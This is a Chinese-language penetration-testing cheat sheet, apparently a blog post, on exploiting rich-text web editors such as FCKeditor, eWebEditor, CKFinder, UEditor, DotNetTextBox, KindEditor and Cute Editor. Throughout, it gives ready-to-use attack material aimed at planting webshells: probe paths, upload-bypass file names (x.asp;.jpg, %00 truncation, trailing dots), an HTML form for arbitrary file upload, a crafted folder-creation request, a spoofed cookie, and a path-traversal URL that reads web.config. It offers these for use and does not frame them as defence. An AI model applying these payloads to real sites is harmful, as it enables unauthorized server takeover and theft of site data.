常見編輯器漏洞

編輯器利用

查找編輯器目錄

• 目錄掃描
• 目錄周遊
• 蜘蛛爬行          

漏洞利用

• 百度相關編輯器漏洞利用

FCKeditor編輯器頁/檢視編輯器版本/檢視檔案上傳路徑

• FCKeditor編輯器頁
• FCKeditor/_samples/default.html
• 檢視編輯器版本
• FCKeditor/_whatsnew.html
• 檢視檔案上傳路徑
• fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

檢視上傳目錄

• XML頁面中第二行"url=/xxx"的部分就是預設基準上傳路徑
• FCKeditror被動限制政策所導緻的過濾不嚴問題
• 影響版本:FCKeditor x.x <= FCKeditor v2.4.3

脆弱性描述

• FCKeditor v2.4.3中File類别預設拒絕上傳類型
• html |htm| php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
• pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
• Fckeditor 2.0 <=2.2 允許上傳asa、cer、php2、php4、inc、pwnl、pht字尾的檔案
• 上傳後 它儲存的檔案直接用的$sFilePath =$sServerDir.$sFileName,而沒有使用$sExtension為字尾
• 直接導緻在win下在上傳檔案後面加個.來突破
• 而在apache下，因為"Apache檔案名解析缺陷漏洞”也可以利用之

漏洞版本

• windows有任意檔案上傳漏洞如x.asp;.jpg
• Apache+linux環境下在上傳檔案後面加個.突破!測試通過

Version <=2.4.2 For php

在處理PHP在上傳的地方并未對media類型進行進行上傳檔案類型的控制,導緻使用者上傳任意檔案!将以下儲存為html檔案，修改action位址

<form id="fmUpload" enctype="multipart/form-data"

action="http://www.site.com/FCKeditor/editor?filemanage/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>

<input type="file" name ="NewFile" size="50"><br>

<input id="btnUpload" type="submit" value="Upload">

</form>

FCKeditor 檔案上傳“.”變“_”下劃線的繞過方法

• 很多時候上傳的檔案例如: shell.php.rar 或者shell.php;.jpg會變為shell_php;.jpg這是新版FCK的變化
• 送出shell.php+空格繞過
• 不過空格隻支援win系統*nix是不支援的[shell.php 和shell.php+空格是2個不同的檔案 未測試
• 繼續上傳同名檔案可變為shell.php;(1).jpg 也可以建立一個檔案夾,隻檢測了第一級的目錄，如果跳到二級目錄就不受限制

突破建立檔案夾

 FCKeditor_2.5/editor/filemanager/connectors/asp/connector.aspCommand=Createfolder&Type=Image&Currentfolder=/xx.asp&NewFoldername=x.asp

FCKeditor中test檔案的上傳位址

• FCKeditor/editor/filemanager/browser/default/connectors/test.html
• FCKeditor/editor/filemanager/upload/test.html
• FCKeditor/editor/filemanager/connectors/test.html
• FCKeditor/editor/filemanager/connectors/uploadtest.html

繞過asp;.jpg變asp_jpg

• 使用特殊名稱繞過
• a.aspx.a;.a.aspx.jpg..jpg.aspx
• xx.asp.;.jpg

EWEbeditor

1.進背景   

• 通過弱密碼
• 下載下傳預設資料庫   ewebeditor/db/ewebeditor.mdb
• burp抓包爆破
• 利用注入點得到密碼

如果沒有背景

利用目錄周遊漏洞，找網站資料庫位置下載下傳網站資料庫，登入網站背景拿shell

利用exp進行

構造上傳

2.修改上傳類型

3.自己添加上傳樣式以後添加上傳按鈕一一上傳

CKFinder

任意檔案上傳漏洞

• 其1.4.3 asp.net版本存在任意檔案上傳漏洞，攻擊者可以利用該漏洞上傳任意檔案，CKFinder在上傳檔案的時候，強制将檔案名(不包括字尾)中點号等其他字元轉為下劃線_,但是在修改檔案名時卻沒有任何限制，進而導緻可以上傳1_php;1.jpg等畸形檔案名，最終導緻檔案上傳漏洞
• 然後修改檔案名
• 1_php;1.jpg
• 利用iis6.0目錄解析漏洞拿shell
• 建立目錄/x.asp/
• 在目錄下上傳圖檔馬即可拿shell

南方資料編輯器southidceditor

首先登陸背景

利用編輯器上傳

通路admin/southidceditor/admin_style.asp

修改編輯器樣式，增加asa(不要asp).然後直接背景編輯新聞上傳

UEDITOR

• 利用ii6.0檔案名解析漏洞
• 上傳圖檔改名為
• x.php;20221.jpg擷取shell

DotNetTextBox編輯器漏洞

• 關鍵字:system_dntb/
• 确定有system_dntb/uploadimg.aspx并能打開，這時候是不能上傳的，由于他是驗證cookie來得出上傳後的路徑，這樣我們可以用cookie欺騙工具
• cookie:UserType=0;IsEdition=0;Info=1;
• uploadFolder=../system_dntb/Upload/;
• 路徑可以修改，隻要權限夠，上傳後改名為1.asp;.jpg利用iis解析漏洞

PHPWEB網站管理系統背景Kedit編輯器

• 兩種利用方式
• 第一種是利用iis6.0檔案名解析漏洞
• xx.php;xx.jpg
• 第二種方式
• %00截斷
• xx.php%00jpg

Cute Editor 線上編輯器本地包含漏洞

• 影響版本：
• Cute Editor For Net 6.4
• 脆弱描述
• 可以随意檢視網站檔案内容，危害較大
• 攻擊利用

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config

等等編輯器漏洞，其餘特殊編輯器漏洞，需要時可自行百度查找他們的漏洞